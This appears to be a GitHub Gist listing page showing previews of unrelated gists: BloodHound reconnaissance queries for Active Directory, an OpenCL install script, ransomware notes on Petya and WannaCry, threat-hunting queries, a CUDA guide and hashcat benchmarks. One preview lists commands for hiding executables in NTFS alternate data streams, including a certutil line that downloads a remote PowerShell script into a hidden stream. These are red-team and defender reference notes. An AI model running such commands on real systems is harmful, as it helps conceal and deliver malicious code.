@mgeeky
mgeeky / red-teaming-bloodhound-cypher-queries.md
Last active August 13, 2022 11:36
(OBSOLETED - most recent version: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md ). A handy list of Cypher queries that I've used during AD assessments

(THIS LIST IS OBSOLETED, check out the latest version here: https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md )

  • Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by their operating system versions, along with the number of machines running each specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC
@nottux
nottux / opencl-amd_aur_ubuntu.bash
Last active October 19, 2023 20:23
bash implementation of opencl-amd AUR package, Install opencl amdgpu amdgpu-pro opencl only. Supports ubuntu and others with standard prefix
#!/bin/bash
# DO NOT run the line 167 standalone. It will remove the necessary files besides the junk!
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h\|\-\-no\-deb\|\-\-no\-install\|\-\-no\-cleaning\|\-\-assume\-debian"
then :
else echo wrong entry\(ies\) !
help=yes
fi
if echo $@|grep -q "\-\-help\|\-help\|\-h\|help\|\-\-h" || [ "$help" = yes ]
Serial Keys:
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active July 4, 2024 15:33
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@jermdw
jermdw / tanium_hunting_questions.md
Last active January 2, 2024 18:50
Tanium Hunting Questions

Initial Infection

New Scripts in Webroot Paths

Get "Trace File Operations[unlimited, 1488479715768|1488483314768, 1, 0, 0, 10, .*\\wwwroot\\.*\.(asp|aspx|cfm|jsp|php), CreateNewFile, , , ]" from all machines

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C

Ransomware attack.

About

This gist was built by the community of researchers and was scribed by Kir and Igor from QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!

Gist updates

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up, the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@alexlee-gk
alexlee-gk / configure_cuda_p70.md
Last active June 21, 2024 03:40
Use integrated graphics for display and NVIDIA GPU for CUDA on Ubuntu 14.04

This was tested on a ThinkPad P70 laptop with Intel integrated graphics and an NVIDIA GPU:

lspci | egrep 'VGA|3D'
00:02.0 VGA compatible controller: Intel Corporation Device 191b (rev 06)
01:00.0 VGA compatible controller: NVIDIA Corporation GM204GLM [Quadro M3000M] (rev a1)

A reason to use the integrated graphics for display is if installing the NVIDIA drivers causes the display to stop working properly. In my case, Ubuntu would get stuck in a login loop after installing the NVIDIA drivers. This happened regardless of whether I installed the drivers from the "Additional Drivers" tab in "System Settings" or from the ppa:graphics-drivers/ppa on the command line.

@epixoip
epixoip / 8x1080.md
Last active March 20, 2024 17:14
8x Nvidia GTX 1080 Hashcat Benchmarks